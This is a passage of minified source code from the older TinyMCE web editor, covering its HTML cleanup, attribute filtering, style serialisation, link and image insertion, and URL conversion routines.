Object();attrib.name=attribName;attrib.value=attribValue;return attrib;}else return null;}if(tinyMCE.cleanup_verify_html&&!verified){for(var i=1;i<valid_attributes.length;i++){var attribMatch=valid_attributes[i][0];var re=null;if(attribMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){attribMatch=attribMatch.replace(new RegExp('\\?','g'),'(\\S?)');attribMatch=attribMatch.replace(new RegExp('\\+','g'),'(\\S+)');attribMatch=attribMatch.replace(new RegExp('\\*','g'),'(\\S*)');attribMatch="^"+attribMatch+"$";re=new RegExp(attribMatch,'g');}if((re&&attribName.match(re)!=null)||attribName==attribMatch){verified=true;attribMustBeValue=valid_attributes[i][3];break;}}if(!verified)return false;}else verified=true;switch(attribName){case "size":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.size;break;case "width":case "height":case "border":if(tinyMCE.isMSIE5)attribValue=eval("element_node."+attribName);break;case "shape":attribValue=attribValue.toLowerCase();break;case "cellspacing":if(tinyMCE.isMSIE5)attribValue=element_node.cellSpacing;break;case "cellpadding":if(tinyMCE.isMSIE5)attribValue=element_node.cellPadding;break;case "color":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.color;break;case "class":if(tinyMCE.cleanup_on_save&&attribValue.indexOf('mceItemAnchor')!=-1)attribValue=attribValue.replace(/mceItem[a-z0-9]+/gi,'');if(element_name=="table"||element_name=="td"){if(tinyMCE.cleanup_visual_table_class!="")attribValue=tinyMCE.getVisualAidClass(attribValue,!tinyMCE.cleanup_on_save);}if(!tinyMCE._verifyClass(element_node)||attribValue=="")return null;break;case "onfocus":case "onblur":case "onclick":case "ondblclick":case "onmousedown":case "onmouseup":case "onmouseover":case "onmousemove":case "onmouseout":case "onkeypress":case "onkeydown":case "onkeydown":case "onkeyup":attribValue=tinyMCE.cleanupEventStr(""+attribValue);if(attribValue.indexOf('return false;')==0)attribValue=attribValue.substring(14);break;case "style":attribValue=tinyMCE.serializeStyle(tinyMCE.parseStyle(tinyMCE.getAttrib(element_node,"style")));break;case "href":case "src":if(tinyMCE.isGecko18&&attribName=="src")attribValue=element_node.src;if(!tinyMCE.isMSIE&&attribName=="href"&&element_node.getAttribute("mce_real_href"))attribValue=element_node.getAttribute("mce_real_href");if(!tinyMCE.isMSIE&&attribName=="src"&&element_node.getAttribute("mce_real_src"))attribValue=element_node.getAttribute("mce_real_src");if(tinyMCE.isGecko&&!tinyMCE.getParam('relative_urls'))attribValue=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],attribValue);attribValue=eval(tinyMCE.cleanup_urlconverter_callback+"(attribValue, element_node, tinyMCE.cleanup_on_save);");break;case "colspan":case "rowspan":if(attribValue=="1")return null;break;case "_moz-userdefined":case "editorid":case "mce_real_href":case "mce_real_src":return null;}if(attribMustBeValue!=null){var isCorrect=false;for(var i=0;i<attribMustBeValue.length;i++){if(attribValue==attribMustBeValue[i]){isCorrect=true;break;}}if(!isCorrect)return null;}var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;};TinyMCE.prototype.clearArray=function(ar){for(var key in ar)ar[key]=null;};TinyMCE.prototype.isInstance=function(inst){return inst!=null&&typeof(inst)=="object"&&inst.isTinyMCEControl;};TinyMCE.prototype.parseStyle=function(str){var ar=new Array();if(str==null)return ar;var st=str.split(';');tinyMCE.clearArray(ar);for(var i=0;i<st.length;i++){if(st[i]=='')continue;var re=new RegExp('^\\s*([^:]*):\\s*(.*)\\s*$');var pa=st[i].replace(re,'$1||$2').split('||');if(pa.length==2)ar[pa[0].toLowerCase()]=pa[1];}return ar;};TinyMCE.prototype.compressStyle=function(ar,pr,sf,res){var box=new Array();box[0]=ar[pr+'-top'+sf];box[1]=ar[pr+'-left'+sf];box[2]=ar[pr+'-right'+sf];box[3]=ar[pr+'-bottom'+sf];for(var i=0;i<box.length;i++){if(box[i]==null)return;for(var a=0;a<box.length;a++){if(box[a]!=box[i])return;}}ar[res]=box[0];ar[pr+'-top'+sf]=null;ar[pr+'-left'+sf]=null;ar[pr+'-right'+sf]=null;ar[pr+'-bottom'+sf]=null;};TinyMCE.prototype.serializeStyle=function(ar){var str="";tinyMCE.compressStyle(ar,"border","","border");tinyMCE.compressStyle(ar,"border","-width","border-width");tinyMCE.compressStyle(ar,"border","-color","border-color");for(var key in ar){var val=ar[key];if(typeof(val)=='function')continue;if(val!=null&&val!=''){val=''+val;val=val.replace(new RegExp("url\\(\\'?([^\\']*)\\'?\\)",'gi'),"url('$1')");if(tinyMCE.getParam("force_hex_style_colors"))val=tinyMCE.convertRGBToHex(val);if(val!="url('')")str+=key.toLowerCase()+": "+val+"; ";}}if(new RegExp('; $').test(str))str=str.substring(0,str.length-2);return str;};TinyMCE.prototype.convertRGBToHex=function(s){if(s.toLowerCase().indexOf('rgb')!=-1){var re=new RegExp("rgb\\s*\\(\\s*([0-9]+).*,\\s*([0-9]+).*,\\s*([0-9]+).*\\)","gi");var rgb=s.replace(re,"$1,$2,$3").split(',');if(rgb.length==3){r=parseInt(rgb[0]).toString(16);g=parseInt(rgb[1]).toString(16);b=parseInt(rgb[2]).toString(16);r=r.length==1?'0'+r:r;g=g.length==1?'0'+g:g;b=b.length==1?'0'+b:b;s="#"+r+g+b;}}return s;};TinyMCE.prototype._verifyClass=function(node){if(tinyMCE.isGecko){var className=node.getAttribute('class');if(!className)return false;}if(tinyMCE.isMSIE)var className=node.getAttribute('className');if(tinyMCE.cleanup_verify_css_classes&&tinyMCE.cleanup_on_save){var csses=tinyMCE.getCSSClasses();nonDefinedCSS=true;for(var c=0;c<csses.length;c++){if(csses[c]==className){nonDefinedCSS=false;break;}}if(nonDefinedCSS&&className.indexOf('mce_')!=0){node.removeAttribute('className');node.removeAttribute('class');return false;}}return true;};TinyMCE.prototype.cleanupNode=function(node){var output="";switch(node.nodeType){case 1:var elementData=tinyMCE._cleanupElementName(node.nodeName,node);var elementName=elementData?elementData.element_name:null;var elementValidAttribs=elementData?elementData.valid_attribs:null;var elementAttribs="";var openTag=false,nonEmptyTag=false;if(elementName!=null&&elementName.charAt(0)=='+'){elementName=elementName.substring(1);openTag=true;}if(elementName!=null&&elementName.charAt(0)=='-'){elementName=elementName.substring(1);nonEmptyTag=true;}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var lookup=tinyMCE.cleanup_elementLookupTable;for(var i=0;i<lookup.length;i++){if(lookup[i]==node)return output;}lookup[lookup.length]=node;}if(!elementName){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return output;}if(tinyMCE.cleanup_on_save){if(node.nodeName=="A"&&node.className=="mceItemAnchor"){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return '<a name="'+this.convertStringToXML(node.getAttribute("name"))+'"></a>'+output;}}var re=new RegExp("^(TABLE|TD|TR)$");if(re.test(node.nodeName)){if((node.nodeName!="TABLE"||tinyMCE.cleanup_inline_styles)&&(width=tinyMCE.getAttrib(node,"width"))!=''){node.style.width=width.indexOf('%')!=-1?width:width.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("width");}if((node.nodeName=="TABLE"&&!tinyMCE.cleanup_inline_styles)&&node.style.width!=''){tinyMCE.setAttrib(node,"width",node.style.width.replace('px',''));node.style.width='';}if((height=tinyMCE.getAttrib(node,"height"))!=''){node.style.height=height.indexOf('%')!=-1?height:height.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("height");}}if(tinyMCE.cleanup_inline_styles){var re=new RegExp("^(TABLE|TD|TR|IMG|HR)$");if(re.test(node.nodeName)){tinyMCE._moveStyle(node,'width','width');tinyMCE._moveStyle(node,'height','height');tinyMCE._moveStyle(node,'borderWidth','border');tinyMCE._moveStyle(node,'','vspace');tinyMCE._moveStyle(node,'','hspace');tinyMCE._moveStyle(node,'textAlign','align');tinyMCE._moveStyle(node,'backgroundColor','bgColor');tinyMCE._moveStyle(node,'borderColor','borderColor');tinyMCE._moveStyle(node,'backgroundImage','background');if(tinyMCE.isMSIE5)node.outerHTML=node.outerHTML;}else if(tinyMCE.isBlockElement(node))tinyMCE._moveStyle(node,'textAlign','align');if(node.nodeName=="FONT")tinyMCE._moveStyle(node,'color','color');}if(elementValidAttribs){for(var a=1;a<elementValidAttribs.length;a++){var attribName,attribDefaultValue,attribForceValue,attribValue;attribName=elementValidAttribs[a][0];attribDefaultValue=elementValidAttribs[a][1];attribForceValue=elementValidAttribs[a][2];if(attribDefaultValue!=null||attribForceValue!=null){var attribValue=node.getAttribute(attribName);if(node.getAttribute(attribName)==null||node.getAttribute(attribName)=="")attribValue=attribDefaultValue;attribValue=attribForceValue?attribForceValue:attribValue;if(attribValue=="{$uid}")attribValue="uid_"+(tinyMCE.cleanup_idCount++);if(attribName=="class")attribValue=tinyMCE.getVisualAidClass(attribValue,tinyMCE.cleanup_on_save);node.setAttribute(attribName,attribValue);}}}if((tinyMCE.isMSIE&&!tinyMCE.isOpera)&&elementName=="style")return "<style>"+node.innerHTML+"</style>";if(elementName=="table"&&!node.hasChildNodes())return "";if(node.attributes.length>0){var lastAttrib="";for(var i=0;i<node.attributes.length;i++){if(node.attributes[i].specified){if(tinyMCE.isOpera){if(node.attributes[i].nodeName==lastAttrib)continue;lastAttrib=node.attributes[i].nodeName;}var attrib=tinyMCE._cleanupAttribute(elementValidAttribs,elementName,node.attributes[i],node);if(attrib&&attrib.value!="")elementAttribs+=" "+attrib.name+"="+'"'+this.convertStringToXML(""+attrib.value)+'"';}}}if(tinyMCE.isMSIE&&elementName=="table"&&node.getAttribute("summary")!=null&&elementAttribs.indexOf('summary')==-1){var summary=tinyMCE.getAttrib(node,'summary');if(summary!='')elementAttribs+=" summary="+'"'+this.convertStringToXML(summary)+'"';}if(tinyMCE.isMSIE5&&/^(td|img|a)$/.test(elementName)){var ma=new Array("scope","longdesc","hreflang","charset","type");for(var u=0;u<ma.length;u++){if(node.getAttribute(ma[u])!=null){var s=tinyMCE.getAttrib(node,ma[u]);if(s!='')elementAttribs+=" "+ma[u]+"="+'"'+this.convertStringToXML(s)+'"';}}}if(tinyMCE.isMSIE&&elementName=="input"){if(node.type){if(!elementAttribs.match(/type=/g))elementAttribs+=" type="+'"'+node.type+'"';}if(node.value){if(!elementAttribs.match(/value=/g))elementAttribs+=" value="+'"'+node.value+'"';}}if((elementName=="p"||elementName=="td")&&(node.innerHTML==""||node.innerHTML==" "))return "<"+elementName+elementAttribs+">"+this.convertStringToXML(String.fromCharCode(160))+"</"+elementName+">";if(tinyMCE.isMSIE&&elementName=="script")return "<"+elementName+elementAttribs+">"+node.text+"</"+elementName+">";if(node.hasChildNodes()){if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="<div"+elementAttribs+">";else output+="<"+elementName+elementAttribs+">";}for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="</div><br />";else output+="</"+elementName+">";}}else{if(!nonEmptyTag){if(openTag)output+="<"+elementName+elementAttribs+"></"+elementName+">";else output+="<"+elementName+elementAttribs+" />";}}return output;case 3:if(node.parentNode.nodeName=="SCRIPT"||node.parentNode.nodeName=="STYLE")return node.nodeValue;return this.convertStringToXML(node.nodeValue);case 8:return "<!--"+node.nodeValue+"-->";default:return "[UNKNOWN NODETYPE "+node.nodeType+"]";}};TinyMCE.prototype.convertStringToXML=function(html_data){var output="";for(var i=0;i<html_data.length;i++){var chr=html_data.charCodeAt(i);if(tinyMCE.settings['entity_encoding']=="numeric"){if(chr>127)output+='&#'+chr+";";else output+=String.fromCharCode(chr);continue;}if(tinyMCE.settings['entity_encoding']=="raw"){output+=String.fromCharCode(chr);continue;}if(typeof(tinyMCE.cleanup_entities["c"+chr])!='undefined'&&tinyMCE.cleanup_entities["c"+chr]!='')output+='&'+tinyMCE.cleanup_entities["c"+chr]+';';else output+=''+String.fromCharCode(chr);}return output;};TinyMCE.prototype._getCleanupElementName=function(chunk){var pos;if(chunk.charAt(0)=='+')chunk=chunk.substring(1);if(chunk.charAt(0)=='-')chunk=chunk.substring(1);if((pos=chunk.indexOf('/'))!=-1)chunk=chunk.substring(0,pos);if((pos=chunk.indexOf('['))!=-1)chunk=chunk.substring(0,pos);return chunk;};TinyMCE.prototype._initCleanup=function(){var validElements=tinyMCE.settings["valid_elements"];validElements=validElements.split(',');var extendedValidElements=tinyMCE.settings["extended_valid_elements"];extendedValidElements=extendedValidElements.split(',');for(var i=0;i<extendedValidElements.length;i++){var elementName=this._getCleanupElementName(extendedValidElements[i]);var skipAdd=false;for(var x=0;x<validElements.length;x++){if(this._getCleanupElementName(validElements[x])==elementName){validElements[x]=extendedValidElements[i];skipAdd=true;break;}}if(!skipAdd)validElements[validElements.length]=extendedValidElements[i];}for(var i=0;i<validElements.length;i++){var item=validElements[i];item=item.replace('[','|');item=item.replace(']','');var attribs=item.split('|');for(var x=0;x<attribs.length;x++)attribs[x]=attribs[x].toLowerCase();attribs[0]=attribs[0].split('/');for(var x=1;x<attribs.length;x++){var attribName=attribs[x];var attribDefault=null;var attribForce=null;var attribMustBe=null;if((pos=attribName.indexOf('='))!=-1){attribDefault=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf(':'))!=-1){attribForce=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf('<'))!=-1){attribMustBe=attribName.substring(pos+1).split('?');attribName=attribName.substring(0,pos);}attribs[x]=new Array(attribName,attribDefault,attribForce,attribMustBe);}validElements[i]=attribs;}var invalidElements=tinyMCE.settings['invalid_elements'].split(',');for(var i=0;i<invalidElements.length;i++)invalidElements[i]=invalidElements[i].toLowerCase();tinyMCE.settings['cleanup_validElements']=validElements;tinyMCE.settings['cleanup_invalidElements']=invalidElements;tinyMCE.settings['cleanup_entities']=new Array();var entities=tinyMCE.getParam('entities','',true,',');for(var i=0;i<entities.length;i+=2)tinyMCE.settings['cleanup_entities']['c'+entities[i]]=entities[i+1];};TinyMCE.prototype._cleanupHTML=function(inst,doc,config,element,visual,on_save){if(!tinyMCE.settings['cleanup'])return element.innerHTML;if(on_save&&tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertFontsToSpans(doc);tinyMCE._customCleanup(inst,on_save?"get_from_editor_dom":"insert_to_editor_dom",doc.body);tinyMCE.cleanup_validElements=tinyMCE.settings['cleanup_validElements'];tinyMCE.cleanup_entities=tinyMCE.settings['cleanup_entities'];tinyMCE.cleanup_invalidElements=tinyMCE.settings['cleanup_invalidElements'];tinyMCE.cleanup_verify_html=tinyMCE.settings['verify_html'];tinyMCE.cleanup_force_br_newlines=tinyMCE.settings['force_br_newlines'];tinyMCE.cleanup_urlconverter_callback=tinyMCE.settings['urlconverter_callback'];tinyMCE.cleanup_verify_css_classes=tinyMCE.settings['verify_css_classes'];tinyMCE.cleanup_visual_table_class=tinyMCE.settings['visual_table_class'];tinyMCE.cleanup_apply_source_formatting=tinyMCE.settings['apply_source_formatting'];tinyMCE.cleanup_inline_styles=tinyMCE.settings['inline_styles'];tinyMCE.cleanup_visual_aid=visual;tinyMCE.cleanup_on_save=on_save;tinyMCE.cleanup_idCount=0;tinyMCE.cleanup_elementLookupTable=new Array();var startTime=new Date().getTime();if(tinyMCE.isMSIE){var nodes=element.getElementsByTagName("hr");for(var i=0;i<nodes.length;i++){if(nodes[i].id=="null")nodes[i].removeAttribute("id");}tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<p>[ \n\r]*<hr.*>[ \n\r]*</p>','<hr />','gi'));tinyMCE.setInnerHTML(element,tinyMCE.regexpReplace(element.innerHTML,'<!([^-(DOCTYPE)]* )|<!/[^-]*>','','gi'));}var html=this.cleanupNode(element);if(tinyMCE.settings['debug'])tinyMCE.debug("Cleanup process executed in: "+(new Date().getTime()-startTime)+" ms.");html=tinyMCE.regexpReplace(html,'<p><hr /></p>','<hr />');html=tinyMCE.regexpReplace(html,'<p> </p><hr /><p> </p>','<hr />');html=tinyMCE.regexpReplace(html,'<td>\\s*<br />\\s*</td>','<td> </td>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s* \\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s* \\s*<br />\\s*</p>','<p> </p>');html=tinyMCE.regexpReplace(html,'<p>\\s*<br />\\s* \\s*</p>','<p> </p>');html=html.replace(new RegExp('<a>(.*?)</a>','gi'),'$1');if(!tinyMCE.isMSIE)html=html.replace(new RegExp('<o:p _moz-userdefined="" />','g'),"");if(tinyMCE.settings['remove_linebreaks'])html=html.replace(new RegExp('\r|\n','g'),' ');if(tinyMCE.getParam('apply_source_formatting')){html=html.replace(new RegExp('<(p|div)([^>]*)>','g'),"\n<$1$2>\n");html=html.replace(new RegExp('<\/(p|div)([^>]*)>','g'),"\n</$1$2>\n");html=html.replace(new RegExp('<br />','g'),"<br />\n");}if(tinyMCE.settings['force_br_newlines']){var re=new RegExp('<p> </p>','g');html=html.replace(re,"<br />");}if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt']){var re=new RegExp('<>','g');html=html.replace(re,"");}html=tinyMCE._customCleanup(inst,on_save?"get_from_editor":"insert_to_editor",html);var chk=tinyMCE.regexpReplace(html,"[ \t\r\n]","").toLowerCase();if(chk=="<br/>"||chk=="<br>"||chk=="<p> </p>"||chk=="<p> </p>"||chk=="<p></p>")html="";if(tinyMCE.settings["preformatted"])return "<pre>"+html+"</pre>";return html;};TinyMCE.prototype.insertLink=function(href,target,title,onclick,style_class){tinyMCE.execCommand('mceBeginUndoLevel');if(this.selectedInstance&&this.selectedElement&&this.selectedElement.nodeName.toLowerCase()=="img"){var doc=this.selectedInstance.getDoc();var linkElement=tinyMCE.getParentElement(this.selectedElement,"a");var newLink=false;if(!linkElement){linkElement=doc.createElement("a");newLink=true;}href=eval(tinyMCE.settings['urlconverter_callback']+"(href, linkElement);");tinyMCE.setAttrib(linkElement,'href',href);tinyMCE.setAttrib(linkElement,'target',target);tinyMCE.setAttrib(linkElement,'title',title);tinyMCE.setAttrib(linkElement,'onclick',onclick);tinyMCE.setAttrib(linkElement,'class',style_class);if(newLink){linkElement.appendChild(this.selectedElement.cloneNode(true));this.selectedElement.parentNode.replaceChild(linkElement,this.selectedElement);}return;}if(!this.linkElement&&this.selectedInstance){if(tinyMCE.isSafari){tinyMCE.execCommand("mceInsertContent",false,'<a href="'+tinyMCE.uniqueURL+'">'+this.selectedInstance.getSelectedHTML()+'</a>');}else this.selectedInstance.contentDocument.execCommand("createlink",false,tinyMCE.uniqueURL);tinyMCE.linkElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);var elementArray=this.getElementsByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);for(var i=0;i<elementArray.length;i++){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, elementArray[i]);");tinyMCE.setAttrib(elementArray[i],'href',href);tinyMCE.setAttrib(elementArray[i],'mce_real_href',href);tinyMCE.setAttrib(elementArray[i],'target',target);tinyMCE.setAttrib(elementArray[i],'title',title);tinyMCE.setAttrib(elementArray[i],'onclick',onclick);tinyMCE.setAttrib(elementArray[i],'class',style_class);}tinyMCE.linkElement=elementArray[0];}if(this.linkElement){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, this.linkElement);");tinyMCE.setAttrib(this.linkElement,'href',href);tinyMCE.setAttrib(this.linkElement,'mce_real_href',href);tinyMCE.setAttrib(this.linkElement,'target',target);tinyMCE.setAttrib(this.linkElement,'title',title);tinyMCE.setAttrib(this.linkElement,'onclick',onclick);tinyMCE.setAttrib(this.linkElement,'class',style_class);}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.insertImage=function(src,alt,border,hspace,vspace,width,height,align,title,onmouseover,onmouseout){tinyMCE.execCommand('mceBeginUndoLevel');if(src=="")return;if(!this.imgElement&&tinyMCE.isSafari){var html="";html+='<img src="'+src+'" alt="'+alt+'"';html+=' border="'+border+'" hspace="'+hspace+'"';html+=' vspace="'+vspace+'" width="'+width+'"';html+=' height="'+height+'" align="'+align+'" title="'+title+'" onmouseover="'+onmouseover+'" onmouseout="'+onmouseout+'" />';tinyMCE.execCommand("mceInsertContent",false,html);}else{if(!this.imgElement&&this.selectedInstance){if(tinyMCE.isSafari)tinyMCE.execCommand("mceInsertContent",false,'<img src="'+tinyMCE.uniqueURL+'" />');else this.selectedInstance.contentDocument.execCommand("insertimage",false,tinyMCE.uniqueURL);tinyMCE.imgElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"img","src",tinyMCE.uniqueURL);}}if(this.imgElement){var needsRepaint=false;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, tinyMCE.imgElement);");if(onmouseover&&onmouseover!="")onmouseover="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, tinyMCE.imgElement);")+"';";if(onmouseout&&onmouseout!="")onmouseout="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, tinyMCE.imgElement);")+"';";if(typeof(title)=="undefined")title=alt;if(width!=this.imgElement.getAttribute("width")||height!=this.imgElement.getAttribute("height")||align!=this.imgElement.getAttribute("align"))needsRepaint=true;tinyMCE.setAttrib(this.imgElement,'src',src);tinyMCE.setAttrib(this.imgElement,'mce_real_src',src);tinyMCE.setAttrib(this.imgElement,'alt',alt);tinyMCE.setAttrib(this.imgElement,'title',title);tinyMCE.setAttrib(this.imgElement,'align',align);tinyMCE.setAttrib(this.imgElement,'border',border,true);tinyMCE.setAttrib(this.imgElement,'hspace',hspace,true);tinyMCE.setAttrib(this.imgElement,'vspace',vspace,true);tinyMCE.setAttrib(this.imgElement,'width',width,true);tinyMCE.setAttrib(this.imgElement,'height',height,true);tinyMCE.setAttrib(this.imgElement,'onmouseover',onmouseover);tinyMCE.setAttrib(this.imgElement,'onmouseout',onmouseout);if(width&&width!="")this.imgElement.style.pixelWidth=width;if(height&&height!="")this.imgElement.style.pixelHeight=height;if(needsRepaint)tinyMCE.selectedInstance.repaint();}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.getElementByAttributeValue=function(node,element_name,attrib,value){var elements=this.getElementsByAttributeValue(node,element_name,attrib,value);if(elements.length==0)return null;return elements[0];};TinyMCE.prototype.getElementsByAttributeValue=function(node,element_name,attrib,value){var elements=new Array();if(node&&node.nodeName.toLowerCase()==element_name){if(node.getAttribute(attrib)&&node.getAttribute(attrib).indexOf(value)!=-1)elements[elements.length]=node;}if(node&&node.hasChildNodes()){for(var x=0,n=node.childNodes.length;x<n;x++){var childElements=this.getElementsByAttributeValue(node.childNodes[x],element_name,attrib,value);for(var i=0,m=childElements.length;i<m;i++)elements[elements.length]=childElements[i];}}return elements;};TinyMCE.prototype.isBlockElement=function(node){return node!=null&&node.nodeType==1&&this.blockRegExp.test(node.nodeName);};TinyMCE.prototype.getParentBlockElement=function(node){while(node){if(this.blockRegExp.test(node.nodeName))return node;node=node.parentNode;}return null;};TinyMCE.prototype.getNodeTree=function(node,node_array,type,node_name){if(typeof(type)=="undefined"||node.nodeType==type&&(typeof(node_name)=="undefined"||node.nodeName==node_name))node_array[node_array.length]=node;if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)tinyMCE.getNodeTree(node.childNodes[i],node_array,type,node_name);}return node_array;};TinyMCE.prototype.getParentElement=function(node,names,attrib_name,attrib_value){if(typeof(names)=="undefined"){if(node.nodeType==1)return node;while((node=node.parentNode)!=null&&node.nodeType!=1);return node;}var namesAr=names.split(',');if(node==null)return null;do{for(var i=0;i<namesAr.length;i++){if(node.nodeName.toLowerCase()==namesAr[i].toLowerCase()||names=="*"){if(typeof(attrib_name)=="undefined")return node;else if(node.getAttribute(attrib_name)){if(typeof(attrib_value)=="undefined"){if(node.getAttribute(attrib_name)!="")return node;}else if(node.getAttribute(attrib_name)==attrib_value)return node;}}}}while((node=node.parentNode)!=null);return null;};TinyMCE.prototype.convertURL=function(url,node,on_save){var prot=document.location.protocol;var host=document.location.hostname;var port=document.location.port;var fileProto=(prot=="file:");url=tinyMCE.regexpReplace(url,'(http|https):///','/');if(url.indexOf('mailto:')!=-1||url.indexOf('javascript:')!=-1||tinyMCE.regexpReplace(url,'[ \t\r\n\+]|%20','').charAt(0)=="#")return url;if(!tinyMCE.isMSIE&&!on_save&&url.indexOf("://")==-1&&url.charAt(0)!='/')return tinyMCE.settings['base_href']+url;if(!tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var baseUrlParts=tinyMCE.parseURL(tinyMCE.settings['base_href']);if(urlParts['anchor']&&urlParts['path']==baseUrlParts['path'])return "#"+urlParts['anchor'];}if(on_save&&tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var tmpUrlParts=tinyMCE.parseURL(tinyMCE.settings['document_base_url']);if(urlParts['host']==tmpUrlParts['host']&&(!urlParts['port']||urlParts['port']==tmpUrlParts['port']))return tinyMCE.convertAbsoluteURLToRelativeURL(tinyMCE.settings['document_base_url'],url);}if(!fileProto&&tinyMCE.getParam('remove_script_host')){var start="",portPart="";if(port!="")portPart=":"+port;start=prot+"//"+host+portPart+"/";if(url.indexOf(start)==0)url=url.substring(start.length-1);if(!tinyMCE.getParam('relative_urls')&&url.indexOf('://')==-1&&url.charAt(0)!='/')url='/'+url;}return url;};TinyMCE.prototype.parseURL=function(url_str){var urlParts=new Array();if(url_str){var pos,lastPos;pos=url_str.indexOf('://');if(pos!=-1){urlParts['protocol']=url_str.substring(0,pos);lastPos=pos+3;}for(var i=lastPos;i<url_str.length;i++){var chr=url_str.charAt(i);if(chr==':')break;if(chr=='/')break;}pos=i;urlParts['host']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)==':'){pos=url_str.indexOf('/',lastPos);urlParts['port']=url_str.substring(lastPos+1,pos);}lastPos=pos;pos=url_str.indexOf('?',lastPos);if(pos==-1)pos=url_str.indexOf('#',lastPos);if(pos==-1)pos=url_str.length;urlParts['path']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)=='?'){pos=url_str.indexOf('#');pos=(pos==-1)?url_str.length:pos;urlParts['query']=url_str.substring(lastPos+1,pos);}lastPos=pos;if(url_str.charAt(pos)=='#'){pos=url_str.length;urlParts['anchor']=url_str.substring(lastPos+1,pos);}}return urlParts;};TinyMCE.prototype.serializeURL=function(up){var url="";if(up['protocol'])url+=up['protocol']+"://";if(up['host'])url+=up['host'];if(up['port'])url+=":"+up['port'];if(up['path'])url+=up['path'];if(up['query'])url+="?"+up['query'];if(up['anchor'])url+="#"+up['anchor'];return url;};TinyMCE.prototype.convertAbsoluteURLToRelativeURL=function(base_url,url_to_relative){var baseURL=this.parseURL(base_url);var targetURL=this.parseURL(url_to_relative);var strTok1;var strTok2;var breakPoint=0;var outPath="";var forceSlash=false;if(targetURL.path=="")targetURL.path="/";else forceSlash=true;base_url=baseURL.path.substring(0,baseURL.path.lastIndexOf('/'));strTok1=base_url.split('/');strTok2=targetURL.path.split('/');if(strTok1.length>=strTok2.length){for(var i=0;i<strTok1.length;i++){if(i>=strTok2.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(strTok1.length<strTok2.length){for(var i=0;i<strTok2.length;i++){if(i>=strTok1.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(breakPoint==1)return targetURL.path;for(var i=0;i<(strTok1.length-(breakPoint-1));i++)outPath+="../";for(var i=breakPoint-1;i<strTok2.length;i++){if(i!=(breakPoint-1))outPath+="/"+strTok2[i];else outPath+=strTok2[i];}targetURL.protocol=null;targetURL.host=null;targetURL.port=null;targetURL.path=outPath==""&&forceSlash?"/":outPath;return this.serializeURL(targetURL);};TinyMCE.prototype.convertRelativeToAbsoluteURL=function(base_url,relative_url){var baseURL=TinyMCE.prototype.parseURL(base_url);var relURL=TinyMCE.prototype.parseURL(relative_url);if(relative_url==""||relative_url.charAt(0)=='/'||relative_url.indexOf('://')!=-1||relative_url.indexOf('mailto:')!=-1||relative_url.indexOf('javascript:')!=-1)return relative_url;baseURLParts=baseURL['path'].split('/');relURLParts=relURL['path'].split('/');var newBaseURLParts=new Array();for(var i=baseURLParts.length-1;i>=0;i--){if(baseURLParts[i].length==0)continue;newBaseURLParts[newBaseURLParts.length]=baseURLParts[i];}baseURLParts=newBaseURLParts.reverse();var newRelURLParts=new Array();var numBack=0;for(var i=relURLParts.length-1;i>=0;i--){if(relURLParts[i].length==0||relURLParts[i]==".")continue;if(relURLParts[i]=='..'){numBack++;continue;}if(numBack>0){numBack--;continue;}newRelURLParts[newRelURLParts.length]=relURLParts[i];}relURLParts=newRelURLParts.reverse();var len=baseURLParts.length-numBack;var absPath=(len<=0?"":"/")+baseURLParts.slice(0,len).join('/')+"/"+relURLParts.join('/');var start="",end="";relURL.protocol=baseURL.protocol;relURL.host=baseURL.host;relURL.port=baseURL.port;if(relURL.path.charAt(relURL.path.length-1)=="/")absPath+="/";relURL.path=absPath;return TinyMCE.prototype.serializeURL(relURL);};TinyMCE.prototype.getParam=function(name,default_value,strip_whitespace,split_chr){var value=(typeof(this.settings[name])=="undefined")?default_value:this.settings[name];if(value=="true"||value=="false")return(value=="true");if(strip_whitespace)value=tinyMCE.regexpReplace(value,"[ 